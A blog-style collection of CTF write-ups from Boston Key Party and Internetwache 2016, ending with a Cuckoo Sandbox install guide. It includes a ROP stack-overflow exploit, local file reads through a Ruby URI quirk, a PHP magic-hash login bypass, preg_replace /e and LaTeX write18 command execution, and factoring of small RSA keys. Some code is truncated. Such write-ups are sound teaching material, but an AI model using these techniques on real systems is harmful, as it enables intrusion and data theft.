The characters seem to get added to the string, DATA, inside of the Cocos2dxPrefsFile.xml when the game is initialized, when the game layers are loaded, when certain high scores are achieved, and when the game is ending. By following the logical progression that would happen, e.g. you init first, load layers, get high score in linear order, and end the game, you'll form the correct base64 string.

echo 'MGN0ZntDMGNvUzJkX0FuRHJvMWRfRzBtRV9Zb1VfS24wdz99' | base64 --decode  

Boston Key Party CTF 2016 Writeups

Boston Key Party (BkP) CTF is a challenging annual CTF organized by several Boston area university alums. It's a challenging CTF that has focused on exploitation, reversing, and cryptography in the past.

I have friends organizing it, so I gave their challenges a try and managed to solve a few.


Simple Calc

(pwn, solved by 186)

what a nice little calculator! 5400

I teamed up with @kierk for this challenge.

We're given an ELF64 binary. Opening it up in IDA and running the decompiler reveals to us:

int __cdecl main(int argc, const char **argv, const char **envp)  
  void *v3; // rdi@1
  int result; // eax@3
  const char *v5; // rdi@4
  __int64 v6; // rax@4
  char v7; // [sp+10h] [bp-40h]@14
  int v8; // [sp+38h] [bp-18h]@5
  int v9; // [sp+3Ch] [bp-14h]@1
  __int64 v10; // [sp+40h] [bp-10h]@4
  int i; // [sp+4Ch] [bp-4h]@4

  v9 = 0;
  setvbuf(stdin, 0LL, 2LL, 0LL);
  v3 = stdout;
  setvbuf(stdout, 0LL, 2LL, 0LL);
  printf((unsigned __int64)"Expected number of calculations: ");
  _isoc99_scanf((unsigned __int64)"%d");
  handle_newline("%d", &v9);
  if ( v9 <= 255 && v9 > 3 )
    v5 = (const char *)(4 * v9);
    LODWORD(v6) = malloc(v5);
    v10 = v6;
    for ( i = 0; i < v9; ++i )
      v5 = "%d";
      _isoc99_scanf((unsigned __int64)"%d");
      handle_newline("%d", &v8);
      switch ( v8 )
        case 1:
          *(_DWORD *)(v10 + 4LL * i) = dword_6C4A88;
        case 2:
          *(_DWORD *)(v10 + 4LL * i) = dword_6C4AB8;
        case 3:
          *(_DWORD *)(v10 + 4LL * i) = dword_6C4AA8;
        case 4:
          *(_DWORD *)(v10 + 4LL * i) = dword_6C4A98;
          if ( v8 == 5 )
            memcpy(&v7, v10, 4 * v9);
            return 0;
          v5 = "Invalid option.\n";
          puts("Invalid option.\n");
    result = 0;
    puts("Invalid number.");
    result = 0;
  return result;

It seems the program is infact, a simple calc. The program can add, subtract, multiply, or divide for us. Looking deeper into the program's functions reveals that there's nothing really too interesting, summarized here:

  • print_motd - a simple 1 line printf, nothing exploitable
  • handle_newline - does getchar until a \0 or a \n, perhaps buggy, but doesn't seem exploitable
  • print_menu - simple printfs, nothing exploitable
  • adds, subs, muls, divs - do basic arithmetic of two arguments, the arguments are limited to > 39, for some reason. It seems you can cause integer overflows here perhaps. The interesting thing in these is that result of the functions seems to get put into the global data section, .bss.

The main function allows us 5 options, the 4 basic math operators, and a save and exit. The save and exit is particularly interesting. The save and exit option does a memcpy of global memory onto the stack. However, there was only 11 dwords allocated for the copy operation by the stack. If we ask main for more than 11 operations, prompted here: printf((unsigned __int64)"Expected number of calculations: ");, then we'll have a simple stack buffer overflow. With that, we can overwrite the return address, and initiate a ropchain.

There is one other interesting point here, and that's the call to free(). Initially we ran into the problem of free() failing, and causing a segmentation fault when we were playing with the program with over 11 operations. That's because we kept spamming the global memory with the values "40..41..42..43..44", and free() would try to free the memory located at 0x0000000000000059. We were stuck, but we guessed perhaps free() doesn't fail for 0 or null, and that turned out to be true, as documented here:

The free function causes the space pointed to by ptr to be deallocated, that is, made available for further allocation. If ptr is a null pointer, no action occurs.

So we can simply make sure the 19th value copied onto the stack is 0x0000000000000000.

So let's create this ropchain, luckily the binary is gigantic, and has everything we need. Running ropgadget (also included in my sec-tools) on the binary produces for us an already complete ropchain:

ropgadget --binary b28b103ea5f1171553554f0127696a18c6d2dcf7 --ropchain  

Now, we have to get that chain onto the stack, and we're set. We have control of a global array in memory that gets copied onto the stack. Getting the exact bytes we want into that global array is a bit tricky. We have to use one of the operations of the calculator (sub is my favourite), with specially crafted operands. The result of that calculation will be put into the global array. This part is a bit tricky in that it takes 2 operations of the calculator to fill 64-bit blocks in memory that the program uses (due to it being a 64-bit elf) - the calculations return 32-bit numbers. So, we end up with a chain of operations that looks like this:

2          # Subtract operation  
100        # Result = 4602768

2          # Subtract operation  
100        # Result = 0

2          # Subtract operation  
100        # Result = 4602768

2          # Subtract operation  
100        # Result = 0


5 # Save and exit operation  

That will result in 0x0000000000463B90 and 0x0000000000463B90 quad-words in the global memory.

The global array is then copied onto the stack with a save and exit. The copying overwrites the return address on the stack, and begins our ropchain.

Now we have to somehow get the entire ropchain into memory with some calculator operations. I went with a low-tech pwning script for this exploitation. I wrote a pwn_script that outputted the above chain of operations, newlines included. When the pwn_header (to initiate 254 operations, and make sure free() frees 0x0) and the output of the pwn_script is copied into the remote session of the challenge, nc 5400, a series of subtraction operations with different operands will occur. Finally a 5 will be passed to the remote session, and cause a save and exit. That will kick off the ropchain now in the .bss section, revealing to us this tasty shell:

$ ls
$ cat key


(web, solved by 115)

inlining proxy here

This was a fun challenge about a vulnerable Ruby program. Navigating to the webpage given brings us to a simple website that prompts us:

welcome to the automatic resource inliner, we inline all images go to / to get an inlined version of flag is in /flag source is in /source  

Unfortunately the flag is not as easy as just navigating to

Navigating to /source gives us the source code:

require 'nokogiri'  
require 'open-uri'  
require 'sinatra'  
require 'shellwords'  
require 'base64'  
require 'fileutils' 

set :bind, ""  
set :port, 5300  
cdir = Dir.pwd 

get '/' do str = "welcome to the automatic resource inliner, we inline all images" str << " go to / to get an inlined version of" str << " flag  
is in /flag" str << " source is in /source" str end 

get '/source' do "/home/optiproxy/optiproxy.rb" end 

get '/flag' do str = "I mean, /flag on the file system... If you're looking here, I question" str << " your skills" str end 

get '/:url'  
    url = params[:url] 
    main_dir = Dir.pwd 
    temp_dir = "" 
    dir = Dir.mktmpdir "inliner" Dir.chdir dir 
    temp_dir = dir 
    exec = "timeout 2 wget -T 2 --page-requisites #{Shellwords.shellescape url}" `#{exec}` 
    my_dir = Dir.glob ("**/") Dir.chdir my_dir[0] 
    index_file = "index.html" 
    html_file = index_file 
    doc = Nokogiri::HTML(open(index_file)) 
        |img| header = img.xpath('preceding::h2[1]').text 
        image = img['src'] 
        img_data = "" 
        uri_scheme = URI(image).scheme 
            begin if (uri_scheme == "http" or uri_scheme == "https") 
                url = image 
                url = "http://#{url}/#{image}" 
        img_data = open(url).read 
        b64d = "data:image/png;base64," + Base64.strict_encode64(img_data) 
        img['src'] = b64d rescue # gotta catch 'em all puts "lole" next end 
    puts dir FileUtils.rm_rf dir Dir.chdir main_dir doc.to_html 

At first glance, you might think to try exploiting exec = "timeout 2 wget -T 2 --page-requisites #{Shellwords.shellescape url}, but I was unable to find anything online that is able to escape Shellwords.shellescape. I believe it's safe to assume, that's a well written module, with no known exploits, and finding a 0day in it, while possible, is probably outside the scope of the challenge.

Moving on to understanding what exactly the code is doing, it seems to follow these steps:

  1. Parse out the parameter given after /, e.g. if navigated to
  2. Create a folder named inliner and change directory into it.
  3. Run wget to create a mirror of the website provided in (1)
  4. Parse index.html from the mirrored website, and for each img tag:
    1. Grab the src parameter of the img tag
      • If the src parameter's URI scheme is http or https, it's good to go
      • Else if the URI scheme isn't http or https, then form a string that does have http uri scheme
    2. Open the url string created in (4a), and read the data from it
    3. Base64 the image data read, and change the src parameter of the img tag to the base64 of the image data
  5. Return the inliner dir to the user of the web app, and clean up

Okay, so where's the exploit? First things first, I tried passing something more interesting than just a simple webpage as the url to the web app to inline, i.e. file://../../../../flag, meaning I navigated to, but that just returns to us the error message saying flag isn't there. I then thought that what I actually need is a website with an img tag whose src parameter is file://../../../../flag, so I whipped that up quickly:

<img src="file://../../../../flag" />  

I served the webpage off of my remote server with python3 -m http.server for a quick HTTP server. Navigating over to gives me a blank screen. Checking the console and source code reveals the issue: Not allowed to load local resource: file://../flag

It looks like the web app did mirror my website, it just didn't actually open the file, because of the uri_scheme check, file != http. Okay, so we really do need something that'll pass the URI scheme check, back to Google to learn more about Ruby's uri_scheme leads me to, jackpot. Interesting, it seems that a URL like http:/foobar will pass the uri_scheme check, and if we can somehow have a folder named http: (note the :) then we have a remote file read (into /flag!). Now... how do we possibly make the folder named http:.

After some thinking, I realized the solution, just make our fake website have a subdirectory named http: that'll get included by the index.html, because the wget call in the webapp is 2 levels deep, this will work!

<img src="./http:/hi" />  
<img src="http:/../../../../../../../../flag" />  

Note that the 2nd src tag above, is to http:/, and not http://. Getting that website inlined, will cause the Ruby web application to create a directory structure with a folder named http: in it, and then open a file in reference to the folder http:, and return to us:

<img src="">  
<img src="">  

Decode the 2nd base64:
BKPCTF{maybe dont inline everything.}

Internetwache 2016 CTF Writeups

The team I run at Boston University just got done competing in the Internetwache 2016 CTF. It was a bunch of fun, and we came in 84th out of 647 active teams, solving over 75% of the challenges.

In light of team members expressing their frustration when reading other people's writeups and how failures are not published enough, this set of writeups by me is going to have some failures =D.



(rev70, solved by 186)

Someone handed me this and told me that to pass the exam, I have to extract a secret string. I know cheating is bad, but once does not count. So are you willing to help me?

I teamed up with @kierk for this challenge.

After unzipping the challenge, we're presented with a single ELF32 ARM binary.

file serverfarm  
serverfarm: ELF 32-bit LSB  executable, ARM, EABI5 version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped  

Opening it up in IDA:


Ignoring what it even does, jumping around to the subroutine it's calling (renamed to handle_task) and pressing tab to get IDA pseudocode.


At this point, we're able to statically look over the code, with the knowledge of how the flag is supposed to look and piece together:

IW{S.E + .R.V.E + .R>=F: + A:R:M}


Quick Run

(misc60, solved by 269)

Someone sent me a file with white and black rectangles. I don't know how to read it. Can you help me?

This was a funny challenge where after unzipping it you're presented with a single file that contains a bunch of wonky looking text. If you base64 decode it, you're presented with a set of:

██              ██    ██  ████              ██
██  ██████████  ██████  ██  ██  ██████████  ██
██  ██      ██  ██  ██████  ██  ██      ██  ██
██  ██      ██  ██████████████  ██      ██  ██
██  ██      ██  ██    ██    ██  ██      ██  ██
██  ██████████  ████  ████████  ██████████  ██
██              ██  ██  ██  ██              ██
██████████████████████  ██  ██████████████████
████  ████  ██  ████████      ████  ██  ██  ██
██  ██  ██  ████  ██  ██████      ██████    ██
██  ██          ██  ██      ████  ████████  ██
██  ████████  ██  ██  ██  ██  ██  ██  ██  ████
████  ██    ██  ██  ██  ██  ██  ██  ██  ██  ██
████████████████████  ██  ██  ██  ██  ██  ████
██              ██████  ██  ██  ██  ██  ██  ██
██  ██████████  ████  ██  ██  ██  ██  ██  ████
██  ██      ██  ██  ██  ██  ██  ██  ██  ██  ██
██  ██      ██  ████  ██  ██  ██  ██  ██  ████
██  ██      ██  ██████  ██  ██  ██  ██  ██  ██
██  ██████████  ██    ████████  ████  ██    ██
██              ██████          ██  ██  ██  ██

These are actually QR codes, decoding each one reveals:


We could've saved 5 minutes by realizing to start looking for 'IW' first, and not decoding 'flagis:'.

Mess of Hash

(web50, solved by 170)

Students have developed a new admin login technique. I doubt that it's secure, but the hash isn't crackable. I don't know where the problem is...

This was an interesting challenge. On unzipping the challenge you're presented with a single README.txt.

All info I have is this:  

$admin_user = "pr0_adm1n";
$admin_pw = clean_hash("0e408306536730731920197920342119");

function clean_hash($hash) {  
    return preg_replace("/[^0-9a-f]/","",$hash);

function myhash($str) {  
    return clean_hash(md5(md5($str) . "SALT"));

The website listed in the challenge description is simply a login screen. It's unlikely the challenge is meant to be an SQL injection, or XSS, or anything like that. Checking some basic directories/files consistent with the other challenges tells me that admin.php doesn't exist, nor does admin, but flag.php is there, it's just not readable (flag.php page loads, it's just blank).

So we have to somehow read that flag.php. There's really two ways, it's either just presented to us if we login as the 'pr0_adm1n' user, or via SQLi. Let's see what we can think of for how to login as 'pr0_adm1n' knowing we have what seems to be the server-side hashing code, and the admin's hashed password.

Path of least resistance... we can guess the hash is md5, based on the length of it, let's see if it's cracked already online! Nope, google shows up nothing. Okay, so the hashing code seems to take in a $str, which I guess is probably the password when a user is created in this fictional school (from the challenge description). The password is hashed, then the string "SALT" is appended to it, i.e. salting it, and then it's hashed again. And then for some reason, that I'm not too sure about, it seems to remove all non-hex characters.

The hashing seems clean. I don't see how to get a hash collision, and bruteforce would be lame, and considering it's not found online, it's probably not a short password. I'm out of ideas here, the best I can think of is that this is another one of PHP's infamous security holes, and the md5 function is somehow poorly implemented. Googling for "md5 php dangerous" leads me to PHP: md5('240610708') == md5('QNKCDZO'). Interesting... so reading that it seems that PHP has a weird type issue:

All of them start with 0e, which makes me think that they're being parsed as floats and getting converted to 0.0.

This is exactly what we have. We just have to find a string that myhash()'s into something that starts with 0e, and then it will collide with the check on $admin_pw. Turns out the requirement is a bit stricter, and every hex character after 0e also has to be decimal, 0-9, for the conversion to float 0.0 to happen. But, this is still doable, and we now have a much smaller search space.

$admin_user = "pr0_adm1n";
$admin_pw = clean_hash("0e408306536730731920197920342119");

function clean_hash($hash) {  
    return preg_replace("/[^0-9a-f]/","",$hash);

function myhash($str) {  
    return clean_hash(md5(md5($str) . "SALT"));

function generateRandomString($length = 10) {  
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    return $randomString;

for ($i = 0; $i < 100000000; $i++) {  
    $result = generateRandomString(8);
    if (myhash($result) == $admin_pw) {
        print($result . "  " . myhash($result) . "\n");
woo!KyJg0SXC  0e588095185108872523046880371953  

Logging in with the username, pr0_adm1n, and password, KyJg0SXC, will lead to a hash collision, and at login flag.php is displayed.


Brute with Force

(code80, solved by 90)

People say, you're good at brute forcing... Have fun! Hint: You don't need to crack the 31. character (newline). Try to think of different (common) time representations. Hint2: Time is CET

This is a task I did not successfully get. After reviewing other people's solutions, I realized my mistake was misunderstanding the expected format.

Upon connecting to the challenge server, you're presented with:

Hint: Format is TIME:CHAR  
Char 0: Time is 19:33:21, 052th day of 2016 +- 30 seconds and the hash is: b3007e6bb4ae0e4ff58c719fc11fa89f8cb4cb78  

My thoughts:

So we have a format of TIME:CHAR, however we don't know what exactly is TIME defined as, and what is CHAR defined as? Time could be "19:33:21", or maybe they meant they want the format as "19:33:21, 052th day of 2016 +- 30 seconds", or maybe it's something else? And what is the hash for?

After some debate with the team, I come to the conclusion that they expect the format like this <Time in some format>:<Char presented to you>, where the time can be +/- 30 seconds of when you connected/got the prompt. The hash of that guess should be equal to the hash presented to you. You respond back to the server with <The time that hashed correctly>:<Char presented to you>, and you'll then get sent back the first character of the flag. Do this 32(?) times, and you'll have the flag. Okay!

So there's still the unanswered question of what date format do they want. I'll try everything on the first hash prompted to us (CHAR: 0), whichever date format worked out for that, is the date format we'll use for the next 31 hashes!

import subprocess  
import hashlib

for i in range(-30, 30):  
    dates = []
    dates.append(subprocess.check_output("TZ=Europe/Rome date '+%T' --date='+{} seconds'".format(str(i)), shell=True))
    dates.append(subprocess.check_output("TZ=Europe/Rome date '+%s' --date='+{} seconds'".format(str(i)), shell=True))
    dates.append(subprocess.check_output("TZ=Europe/Rome date '+%Y%m%d-%H%M%S' --date='+{} seconds'".format(str(i)), shell=True))
    dates.append(subprocess.check_output("TZ=Europe/Rome date '+%H%M%S' --date='+{} seconds'".format(str(i)), shell=True))
    dates.append(subprocess.check_output("TZ=Europe/Rome date '+%R' --date='+{} seconds'".format(str(i)), shell=True))
    dates.append(subprocess.check_output("TZ=Europe/Rome date '+%r' --date='+{} seconds'".format(str(i)), shell=True))
    dates.append(subprocess.check_output("TZ=Europe/Rome date '+%c' --date='+{} seconds'".format(str(i)), shell=True))
    dates.append(subprocess.check_output("TZ=Europe/Rome date -R --date='+{} seconds'".format(str(i)), shell=True))
    dates.append(subprocess.check_output("TZ=Europe/Rome date -Iseconds --date='+{} seconds'".format(str(i)), shell=True))
    dates.append(subprocess.check_output("TZ=Europe/Rome date --rfc-3339=seconds --date='+{} seconds'".format(str(i)), shell=True))

    for date in dates:
        guess = date.strip() + ":0"


Nothing hashed to the hash prompted to us. At this point it was late, I was tired, and cursing the challenge. Just tell us what date format you expect! I really don't want to go and Google every imaginable date format there is, and test with every single one. So we didn't solve this challenge.

After the competition, other people's solutions made it clear to me what was wrong. I would have gotten the TIME format correct, my issue was actually the CHAR format. I thought you only had to bruteforce the time, and the 'Char 0', but actually you had to also bruteforce the CHAR. If I simply had another nested loop in my solver trying every ASCII character, I'd have gotten the challenge. Live and learn.

Replace with Grace

(web60, solved by 268)

Regular expressions are pretty useful. Especially when you need to search and replace complex terms.

It's a site that does simple search and replace on an input string.
For example:

Search: /cow/  
Replace: cat  
Input: cows are cute <3  
-> cats are cute <3

My thought process for this challenge was then to find some sort of command injection. I was guessing that the site was using UNIX sed, by using pseudocode like:

cmd = 's' + <search> + <replace> + '/'  
system("echo <input> | sed -i cmd")  

A command injection in this case could be done by making <replace> something like /;cat flag;. But this wasn't working. I tried a few more avenues to get command injection in. Nothing worked. I was still convinced this was command injection into a UNIX shell, so I gave up for a bit and did other challenges.

Coming back to the challenge, after solving a few other web challenges, made me realize that this is probably just feeding strings into PHP's (since all the other web challenges are written in PHP) search and replace function. I'm not a PHP developer, but googling for PHP search and replace leads me to preg_replace. Okay, it's probably this... doesn't seem bad, but PHP is notorious for being dangerous, so let's search up "preg_replace dangerous". Sure enough, preg_replace has a "bug/feature/wtf" where appending an /e to the <search> parameter will cause the <replace> parameter to be executed as code. Simple.

Testing some payloads, there seems to be a list of blocked words, that's nice that they tell us this error message and let us know our payload is on the right track. The blocked word checker is case-sensitive, and funny enough, PHP is not.

Search: /cow/e  
Replace: syStEm("cat flag.php")  
Input: Hi Mom!  
-> $FLAG = IW{R3Pl4c3_N0t_S4F3}


(web90, solved by 193)

Creating and using coperate templates is sometimes really hard. Luckily, we have a webinterace for creating PDF files. Some people doubt it's secure, but I reviewed the whole code and did not find any flaws.

On this challenge website, you're presented with a web app that parses LaTeX into a PDF, and returns that PDF to you. Essentially it's a web wrapper around the CLI pdftex. We already have code running on a machine, and the challenge creators were kind enough to provide us with a print of the stdout.

I've only used LaTeX once before (recently for a paper I submitted to a conference), so I'm fairly knew, but gained a lot of exposure to it. From experience, I know LaTeX is powerful, and can include other files inside of files, i.e. include a fragment .tex file inside of a parent .tex. So, let's Google for how to include a file. It took a lot of wrestling around in LaTeX, but I was finally able to get LaTeX to read an entire file line by line into a PDF, and export that PDF to me.

I decided I need to find a way to execute commands from LaTeX, to get a file listing, to find out where a flag file is. It turns out there's the \immediate\write18{ls xyz.* > temp.dat} construct in LaTeX. write18 is a function that is essentially system("...") for LaTeX. We can do a find / -name "*flag*" and find any files named flag on the file system.

\immediate\write18{find / -name "*flag*" > hihi}
  \advance\linecnt by \@ne
  \readline\myread to \line

Please excuse the shitty LaTeX that probably makes no sense, but this seemed to work mostly.

This returned nothing. Okay, perhaps the flag is stored in a random file. Let's change our system command to search every file for the string 'IW' (the flag format), ls -R / | grep 'IW', and see what we get.
This returns a giant PDF with a bunch of junk. Doing a search using a PDF editor for "flag" reveals:

matchesfl/var/www/$FLAG = ”IW–L4T3x ̇IS ̇Tur1ng ̇c0mpl3t  

Weirdly formatted, but with some knowledge of other flags, I'm able to guess the actual flag is meant to be IW{L4T3x_IS_Tur1ng_c0mpl3te}.

Oh Bob!

(crypto60, solved by 167)

Alice wants to send Bob a confidential message. They both remember the crypto lecture about RSA. So Bob uses openssl to create key pairs. Finally, Alice encrypts the message with Bob's public keys and sends it to Bob. Clever Eve was able to intercept it. Can you help Eve to decrypt the message?

After unzipping the challenge, we're presented with four files, three public keys, and one file with three encrypted strings.

-----END PUBLIC KEY-----
cat secret.enc  



The description tells us, that we have to decrypt the secret encoded messages. This is public-key cryptography, but all we have are the public keys. To decrypt the messages, we need the private keys.

Luckily, judging by the size of the base64 encoded public keys, the keys are very small. RSA is only secure when a large enough key is used at a minimum 1024-bits, and 2048-bits or more is recommended.

I've never done this before, so my thought was to first figure out what type of key this is, and then figure out how to extract the components of the key (asymmetric keys are not typically simple byte arrays, but instead several numbers concatenated together), and then see where to go from there. This lead me no where. Finding the right openssl commands to use on the key was proving impossible. Every command I found online to simply figure out the type of public key (we don't know if it's RSA, DSA, or something else) inside the given files was giving an error. Eventually I stumbled upon something that finally worked:

openssl asn1parse -dump -i -in  
    0:d=0  hl=2 l=  56 cons: SEQUENCE          
    2:d=1  hl=2 l=  13 cons:  SEQUENCE          
    4:d=2  hl=2 l=   9 prim:   OBJECT            :rsaEncryption
   15:d=2  hl=2 l=   0 prim:   NULL              
   17:d=1  hl=2 l=  39 prim:  BIT STRING        

Okay, at this point at least I know it's an RSA key finally. I sort of can guess from the output of this that the parts of the key take up 39 bytes. I know that in RSA the "key size" is actually just the modulus in the RSA equation, so the key is ~256 bits - bruteforceable.

Through some luck I stumbled upon, Following his guide I'm able import a public key, and obtain the key's modulus and exponent (the 2 numbers stored in an RSA public key). The modulus can be factored into p*q, through bruteforce, since the modulus is so small - this is a significantly harder bruteforce when the modulus is 4096 bits. Using those factors, we then obtain the final piece of an RSA private key, the private exponent (a RSA private key is p,q,d, whereas a public key is n,e). Pycrypto has a great construct function that allows to easily recreate the corresponding private key. Applying this approach to each of Bob's public keys we can decrypt each message in secret.enc.

Some additional finagling has to be done to apply each recovered private key to each part of the secret.enc file. For that I just used simple copy pasting into 3 separate files. Padding is also typically used in crypto, and we have to account for that. And finally, the authors either messed up or intentionally (or maybe I messed something up?) ordered the messages in secret.enc as corresponding to,, in that order.

from Crypto.PublicKey import RSA  
from Crypto.Cipher import PKCS1_v1_5  
import gmpy  
import base64  
from Crypto import Random  
from Crypto.Hash import SHA

bob1 = """-----BEGIN PUBLIC KEY-----  
-----END PUBLIC KEY-----"""
bob2 = """-----BEGIN PUBLIC KEY-----  
-----END PUBLIC KEY-----"""
bob3 = """-----BEGIN PUBLIC KEY-----  
-----END PUBLIC KEY-----"""

pub1 = RSA.importKey(bob1)  
pub2 = RSA.importKey(bob2)  
pub3 = RSA.importKey(bob3)

n1 = long(pub1.n)  
e1 = long(pub1.e)  
n2 = long(pub2.n)  
e2 = long(pub2.e)  
n3 = long(pub3.n)  
e3 = long(pub3.e)

# Obtained using msieve. Should probably fully pythonize this by using pysieve.
p1 = 17963604736595708916714953362445519  
q1 = 20016431322579245244930631426505729  
p2 = 16514150337068782027309734859141427  
q2 = 16549930833331357120312254608496323  
p3 = 17357677172158834256725194757225793  
q3 = 19193025210159847056853811703017693

d1 = long(gmpy.invert(e1,(p1-1)*(q1-1)))  
d2 = long(gmpy.invert(e2,(p2-1)*(q2-1)))  
d3 = long(gmpy.invert(e3,(p3-1)*(q3-1)))

key1 = RSA.construct((n1,e1,d1))  
key2 = RSA.construct((n2,e2,d2))  
key3 = RSA.construct((n3,e3,d3))

with open('secret1.bin','r') as f1:  
    enc1 =
with open('secret3.bin','r') as f2:  
    enc2 =
with open('secret2.bin','r') as f3:  
    enc3 =

dsize = SHA.digest_size  
sentinel =

cipher =  
secret = cipher.decrypt(enc1, sentinel)  
print("--- secret 1 ---")  

cipher =  
secret = cipher.decrypt(enc2, sentinel)  
print("--- secret 2 ---")  

cipher =  
secret = cipher.decrypt(enc3, sentinel)  
print("--- secret 3 ---")  

Installing and setting up Cuckoo Sandbox

Been busy last two weeks completing a research paper. Hopefully the code I made for the paper can be released soon. For now, here's some snippets I used to set up part of the environment for the research. (Intentionally vague, as it's not published yet)

This is a quick guide for how to install Cuckoo Sandbox to work with Virtualbox VMs.

Install dependencies for Cuckoo

sudo apt-get install python  
sudo apt-get install mongodb  
sudo apt-get install g++  
sudo apt-get install python-dev python-dpkt python-jinja2 python-magic python-pymongo  
python-gridfs python-libvirt python-bottle python-pefile python-chardet python-pip  
sudo apt-get install libxml2-dev libxslt1-dev  
sudo pip2 install sqlalchemy yara  
sudo pip2 install cybox==  
sudo pip2 install maec==  
sudo pip2 install python-dateutil

sudo apt-get install python-dev libfuzzy-dev  
sudo pip2 install pydeep

sudo apt-get install tcpdump # If not installed  
# Allow tcpdump to read raw TCP data without root:
sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump

wget && unzip && cd volatility-2.4  
sudo python install  
# Install the libraries that volatility wants:
sudo pip2 install distorm3  

Install Cuckoo and Virtual Box

You'll still have to set up the virtual machine, and configure Cuckoo to use that VM. But at least this script will download them for you!

Check out Cuckoo's full documentation here:

git clone git://  
sudo dpkg -i virtualbox-5.0_5.0.14-105127~Ubuntu~trusty_i386.deb  
sudo apt-get install -f  

Cuckoo has really good flexibility to be expanded for your needs. It's entirely open source, and the code base isn't too bad. However, they make it even easier for you with some decent documentation. I blogged about the structure of Cuckoo and how to add custom features to it before, so check it out.


If you follow the Cuckoo documentation then you'll want to set up a host-only network adapter between your guest virtual machine and your host machine. After you do that through the Virtualbox settings, you have to set up the iptables rules for the communication to work.

sudo iptables -A FORWARD -o eth0 -i vboxnet0 -s -m conntrack --ctstate NEW -j ACCEPT;  
sudo iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT;  
sudo iptables -A POSTROUTING -t nat -j MASQUERADE;  
sudo sysctl -w net.ipv4.ip_forward=1;